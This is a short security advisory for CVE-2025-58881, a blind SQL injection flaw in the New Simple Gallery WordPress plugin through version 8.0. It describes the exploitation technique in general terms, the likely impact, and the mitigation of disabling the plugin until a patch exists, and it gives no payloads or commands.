CVE-2025-58881

Vulnerability

Overview

The New Simple Gallery plugin for WordPress, versions up to and including 8.0, contains a blind SQL injection vulnerability due to improper neutralization of special elements used in an SQL command. The flaw resides in the plugin's handling of user-supplied input, which is directly incorporated into SQL queries without adequate sanitization or parameterization [1].

Exploitation

An attacker can exploit this vulnerability without authentication by sending specially crafted HTTP requests to the affected plugin endpoints. The blind SQL injection nature means the attacker does not receive direct error messages but can infer database information through boolean-based or time-based techniques. No special privileges or network position is required beyond standard web access [1].

Impact

Successful exploitation allows an attacker to interact with the underlying database, enabling extraction of sensitive data such as user credentials, session tokens, and other stored information. This can lead to complete site compromise, privilege escalation, and further attacks against the WordPress installation and its users [1].

Mitigation

The vendor has not released a patched version as of the publication date. Users are strongly advised to update the plugin immediately if a fix becomes available. As a workaround, disabling the plugin until a patch is applied can mitigate risk. Given that this vulnerability is likely to be targeted in mass-exploit campaigns, prompt action is critical [1].